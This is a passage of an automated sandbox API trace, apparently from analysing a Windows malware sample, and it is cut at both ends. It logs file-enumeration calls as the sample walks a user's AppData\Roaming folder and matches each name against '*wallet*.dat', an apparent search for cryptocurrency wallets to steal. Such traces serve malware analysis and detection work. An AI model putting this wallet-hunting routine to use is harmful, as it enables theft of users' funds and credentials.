ftCreationTime.dwHighDateTime=0x1d79031, ftLastAccessTime.dwLowDateTime=0x9e737760, ftLastAccessTime.dwHighDateTime=0x1d79601, ftLastWriteTime.dwLowDateTime=0x9e737760, ftLastWriteTime.dwHighDateTime=0x1d79601, nFileSizeHigh=0x0, nFileSizeLow=0x12080, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="4RajgfsE_A1k.gif", cAlternateFileName="4RAJGF~1.GIF")) returned 1 [0207.316] StrCmpCA (pszStr1="4RajgfsE_A1k.gif", pszStr2=".") returned 6 [0207.316] StrCmpCA (pszStr1="4RajgfsE_A1k.gif", pszStr2="..") returned 6 [0207.316] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4RajgfsE_A1k.gif") returned 54 [0207.316] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.316] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="4RajgfsE_A1k.gif") returned 16 [0207.317] PathMatchSpecA (pszFile="4RajgfsE_A1k.gif", pszSpec="*wallet*.dat") returned 0 [0207.317] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4RajgfsE_A1k.gif\\*") returned 56 [0207.317] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4RajgfsE_A1k.gif\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25569ef0, ftCreationTime.dwHighDateTime=0x1d79031, ftLastAccessTime.dwLowDateTime=0x9e737760, ftLastAccessTime.dwHighDateTime=0x1d79601, ftLastWriteTime.dwLowDateTime=0x9e737760, ftLastWriteTime.dwHighDateTime=0x1d79601, nFileSizeHigh=0x0, nFileSizeLow=0x12080, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="4", cAlternateFileName="")) returned 0xffffffff [0207.317] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79493ce0, ftCreationTime.dwHighDateTime=0x1d790a7, ftLastAccessTime.dwLowDateTime=0x30245ad0, ftLastAccessTime.dwHighDateTime=0x1d79373, ftLastWriteTime.dwLowDateTime=0x30245ad0, ftLastWriteTime.dwHighDateTime=0x1d79373, nFileSizeHigh=0x0, nFileSizeLow=0x1751b, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="5sJ8NhtteN.mp4", cAlternateFileName="5SJ8NH~1.MP4")) returned 1 [0207.317] StrCmpCA (pszStr1="5sJ8NhtteN.mp4", pszStr2=".") returned 7 [0207.317] StrCmpCA (pszStr1="5sJ8NhtteN.mp4", pszStr2="..") returned 7 [0207.317] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5sJ8NhtteN.mp4") returned 52 [0207.317] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.317] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="5sJ8NhtteN.mp4") returned 14 [0207.317] PathMatchSpecA (pszFile="5sJ8NhtteN.mp4", pszSpec="*wallet*.dat") returned 0 [0207.317] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5sJ8NhtteN.mp4\\*") returned 54 [0207.317] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5sJ8NhtteN.mp4\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79493ce0, ftCreationTime.dwHighDateTime=0x1d790a7, ftLastAccessTime.dwLowDateTime=0x30245ad0, ftLastAccessTime.dwHighDateTime=0x1d79373, ftLastWriteTime.dwLowDateTime=0x30245ad0, ftLastWriteTime.dwHighDateTime=0x1d79373, nFileSizeHigh=0x0, nFileSizeLow=0x1751b, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="5", cAlternateFileName="")) returned 0xffffffff [0207.317] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcfec5d0, ftCreationTime.dwHighDateTime=0x1d793eb, ftLastAccessTime.dwLowDateTime=0xa375b210, ftLastAccessTime.dwHighDateTime=0x1d7946b, ftLastWriteTime.dwLowDateTime=0xa375b210, ftLastWriteTime.dwHighDateTime=0x1d7946b, nFileSizeHigh=0x0, nFileSizeLow=0x144d4, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="6p_g2CU.bmp", cAlternateFileName="")) returned 1 [0207.317] StrCmpCA (pszStr1="6p_g2CU.bmp", pszStr2=".") returned 8 [0207.317] StrCmpCA (pszStr1="6p_g2CU.bmp", pszStr2="..") returned 8 [0207.317] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6p_g2CU.bmp") returned 49 [0207.317] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.317] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="6p_g2CU.bmp") returned 11 [0207.318] PathMatchSpecA (pszFile="6p_g2CU.bmp", pszSpec="*wallet*.dat") returned 0 [0207.318] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6p_g2CU.bmp\\*") returned 51 [0207.318] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6p_g2CU.bmp\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcfec5d0, ftCreationTime.dwHighDateTime=0x1d793eb, ftLastAccessTime.dwLowDateTime=0xa375b210, ftLastAccessTime.dwHighDateTime=0x1d7946b, ftLastWriteTime.dwLowDateTime=0xa375b210, ftLastWriteTime.dwHighDateTime=0x1d7946b, nFileSizeHigh=0x0, nFileSizeLow=0x144d4, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="6", cAlternateFileName="")) returned 0xffffffff [0207.318] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a21ff40, ftCreationTime.dwHighDateTime=0x1d78c37, ftLastAccessTime.dwLowDateTime=0x9d662460, ftLastAccessTime.dwHighDateTime=0x1d78d61, ftLastWriteTime.dwLowDateTime=0x9d662460, ftLastWriteTime.dwHighDateTime=0x1d78d61, nFileSizeHigh=0x0, nFileSizeLow=0x3932, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="7azD.m4a", cAlternateFileName="")) returned 1 [0207.318] StrCmpCA (pszStr1="7azD.m4a", pszStr2=".") returned 9 [0207.318] StrCmpCA (pszStr1="7azD.m4a", pszStr2="..") returned 9 [0207.318] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7azD.m4a") returned 46 [0207.318] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.318] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="7azD.m4a") returned 8 [0207.318] PathMatchSpecA (pszFile="7azD.m4a", pszSpec="*wallet*.dat") returned 0 [0207.318] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7azD.m4a\\*") returned 48 [0207.318] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7azD.m4a\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a21ff40, ftCreationTime.dwHighDateTime=0x1d78c37, ftLastAccessTime.dwLowDateTime=0x9d662460, ftLastAccessTime.dwHighDateTime=0x1d78d61, ftLastWriteTime.dwLowDateTime=0x9d662460, ftLastWriteTime.dwHighDateTime=0x1d78d61, nFileSizeHigh=0x0, nFileSizeLow=0x3932, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="7", cAlternateFileName="")) returned 0xffffffff [0207.318] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a2e0e0, ftCreationTime.dwHighDateTime=0x1d79219, ftLastAccessTime.dwLowDateTime=0x4dac49a0, ftLastAccessTime.dwHighDateTime=0x1d79819, ftLastWriteTime.dwLowDateTime=0x4dac49a0, ftLastWriteTime.dwHighDateTime=0x1d79819, nFileSizeHigh=0x0, nFileSizeLow=0x6e03, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="7Cxxp0kKfXp.mkv", cAlternateFileName="7CXXP0~1.MKV")) returned 1 [0207.318] StrCmpCA (pszStr1="7Cxxp0kKfXp.mkv", pszStr2=".") returned 9 [0207.319] StrCmpCA (pszStr1="7Cxxp0kKfXp.mkv", pszStr2="..") returned 9 [0207.319] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7Cxxp0kKfXp.mkv") returned 53 [0207.319] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.319] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="7Cxxp0kKfXp.mkv") returned 15 [0207.319] PathMatchSpecA (pszFile="7Cxxp0kKfXp.mkv", pszSpec="*wallet*.dat") returned 0 [0207.319] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7Cxxp0kKfXp.mkv\\*") returned 55 [0207.319] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7Cxxp0kKfXp.mkv\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a2e0e0, ftCreationTime.dwHighDateTime=0x1d79219, ftLastAccessTime.dwLowDateTime=0x4dac49a0, ftLastAccessTime.dwHighDateTime=0x1d79819, ftLastWriteTime.dwLowDateTime=0x4dac49a0, ftLastWriteTime.dwHighDateTime=0x1d79819, nFileSizeHigh=0x0, nFileSizeLow=0x6e03, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="7", cAlternateFileName="")) returned 0xffffffff [0207.319] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="Adobe", cAlternateFileName="")) returned 1 [0207.319] StrCmpCA (pszStr1="Adobe", pszStr2=".") returned 19 [0207.319] StrCmpCA (pszStr1="Adobe", pszStr2="..") returned 19 [0207.319] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe") returned 43 [0207.319] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.319] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="Adobe") returned 5 [0207.319] PathMatchSpecA (pszFile="Adobe", pszSpec="*wallet*.dat") returned 0 [0207.319] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*") returned 45 [0207.319] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.320] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.320] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.320] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.320] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.321] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0207.321] StrCmpCA (pszStr1="Flash Player", pszStr2=".") returned 24 [0207.321] StrCmpCA (pszStr1="Flash Player", pszStr2="..") returned 24 [0207.321] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player") returned 56 [0207.321] StrCmpCA (pszStr1="Adobe", pszStr2="") returned 65 [0207.321] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Adobe\\Flash Player") returned 18 [0207.321] PathMatchSpecA (pszFile="Flash Player", pszSpec="*wallet*.dat") returned 0 [0207.321] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned 58 [0207.321] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x5b0260, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.321] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.321] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x5b0260, cFileName="..", cAlternateFileName="")) returned 1 [0207.321] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.321] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.321] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x5b0260, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0207.321] StrCmpCA (pszStr1="NativeCache", pszStr2=".") returned 32 [0207.322] StrCmpCA (pszStr1="NativeCache", pszStr2="..") returned 32 [0207.322] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 68 [0207.322] StrCmpCA (pszStr1="Adobe\\Flash Player", pszStr2="") returned 65 [0207.322] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Adobe\\Flash Player\\NativeCache") returned 30 [0207.322] PathMatchSpecA (pszFile="NativeCache", pszSpec="*wallet*.dat") returned 0 [0207.322] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned 70 [0207.322] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e77c8 [0207.322] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.322] FindNextFileA (in: hFindFile=0x5e77c8, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.323] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.323] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.323] FindNextFileA (in: hFindFile=0x5e77c8, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.323] FindClose (in: hFindFile=0x5e77c8 | out: hFindFile=0x5e77c8) returned 1 [0207.323] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x5b0260, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0207.323] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.323] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0207.323] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.324] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72867000, ftCreationTime.dwHighDateTime=0x1d78d67, ftLastAccessTime.dwLowDateTime=0x393cf4f0, ftLastAccessTime.dwHighDateTime=0x1d794fa, ftLastWriteTime.dwLowDateTime=0x393cf4f0, ftLastWriteTime.dwHighDateTime=0x1d794fa, nFileSizeHigh=0x0, nFileSizeLow=0xcc66, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Am1F7ighvADX.avi", cAlternateFileName="AM1F7I~1.AVI")) returned 1 [0207.324] StrCmpCA (pszStr1="Am1F7ighvADX.avi", pszStr2=".") returned 19 [0207.324] StrCmpCA (pszStr1="Am1F7ighvADX.avi", pszStr2="..") returned 19 [0207.324] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Am1F7ighvADX.avi") returned 54 [0207.324] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.324] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="Am1F7ighvADX.avi") returned 16 [0207.324] PathMatchSpecA (pszFile="Am1F7ighvADX.avi", pszSpec="*wallet*.dat") returned 0 [0207.324] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Am1F7ighvADX.avi\\*") returned 56 [0207.324] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Am1F7ighvADX.avi\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72867000, ftCreationTime.dwHighDateTime=0x1d78d67, ftLastAccessTime.dwLowDateTime=0x393cf4f0, ftLastAccessTime.dwHighDateTime=0x1d794fa, ftLastWriteTime.dwLowDateTime=0x393cf4f0, ftLastWriteTime.dwHighDateTime=0x1d794fa, nFileSizeHigh=0x0, nFileSizeLow=0xcc66, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="A", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.324] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x292a4fe0, ftCreationTime.dwHighDateTime=0x1d7980b, ftLastAccessTime.dwLowDateTime=0xbc6ddba0, ftLastAccessTime.dwHighDateTime=0x1d79879, ftLastWriteTime.dwLowDateTime=0xbc6ddba0, ftLastWriteTime.dwHighDateTime=0x1d79879, nFileSizeHigh=0x0, nFileSizeLow=0x28a0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="aZQAipL-OBgS.xlsx", cAlternateFileName="AZQAIP~1.XLS")) returned 1 [0207.324] StrCmpCA (pszStr1="aZQAipL-OBgS.xlsx", pszStr2=".") returned 51 [0207.324] StrCmpCA (pszStr1="aZQAipL-OBgS.xlsx", pszStr2="..") returned 51 [0207.324] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\aZQAipL-OBgS.xlsx") returned 55 [0207.324] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.324] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="aZQAipL-OBgS.xlsx") returned 17 [0207.324] PathMatchSpecA (pszFile="aZQAipL-OBgS.xlsx", pszSpec="*wallet*.dat") returned 0 [0207.324] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\aZQAipL-OBgS.xlsx\\*") returned 57 [0207.324] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\aZQAipL-OBgS.xlsx\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x292a4fe0, ftCreationTime.dwHighDateTime=0x1d7980b, ftLastAccessTime.dwLowDateTime=0xbc6ddba0, ftLastAccessTime.dwHighDateTime=0x1d79879, ftLastWriteTime.dwLowDateTime=0xbc6ddba0, ftLastWriteTime.dwHighDateTime=0x1d79879, nFileSizeHigh=0x0, nFileSizeLow=0x28a0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="a", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.324] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b201300, ftCreationTime.dwHighDateTime=0x1d78af2, ftLastAccessTime.dwLowDateTime=0xf7f92e40, ftLastAccessTime.dwHighDateTime=0x1d79013, ftLastWriteTime.dwLowDateTime=0xf7f92e40, ftLastWriteTime.dwHighDateTime=0x1d79013, nFileSizeHigh=0x0, nFileSizeLow=0x18af2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="b42m.avi", cAlternateFileName="")) returned 1 [0207.325] StrCmpCA (pszStr1="b42m.avi", pszStr2=".") returned 52 [0207.325] StrCmpCA (pszStr1="b42m.avi", pszStr2="..") returned 52 [0207.325] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\b42m.avi") returned 46 [0207.325] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.325] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="b42m.avi") returned 8 [0207.325] PathMatchSpecA (pszFile="b42m.avi", pszSpec="*wallet*.dat") returned 0 [0207.325] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\b42m.avi\\*") returned 48 [0207.325] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\b42m.avi\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b201300, ftCreationTime.dwHighDateTime=0x1d78af2, ftLastAccessTime.dwLowDateTime=0xf7f92e40, ftLastAccessTime.dwHighDateTime=0x1d79013, ftLastWriteTime.dwLowDateTime=0xf7f92e40, ftLastWriteTime.dwHighDateTime=0x1d79013, nFileSizeHigh=0x0, nFileSizeLow=0x18af2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="b", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.325] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf927f30, ftCreationTime.dwHighDateTime=0x1d79345, ftLastAccessTime.dwLowDateTime=0xf6da2ac0, ftLastAccessTime.dwHighDateTime=0x1d79426, ftLastWriteTime.dwLowDateTime=0xf6da2ac0, ftLastWriteTime.dwHighDateTime=0x1d79426, nFileSizeHigh=0x0, nFileSizeLow=0x2fee, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="cEkdSu_e3sy.wav", cAlternateFileName="CEKDSU~1.WAV")) returned 1 [0207.325] StrCmpCA (pszStr1="cEkdSu_e3sy.wav", pszStr2=".") returned 53 [0207.325] StrCmpCA (pszStr1="cEkdSu_e3sy.wav", pszStr2="..") returned 53 [0207.325] wsprintfA (in: param_1=0x19d0c0, 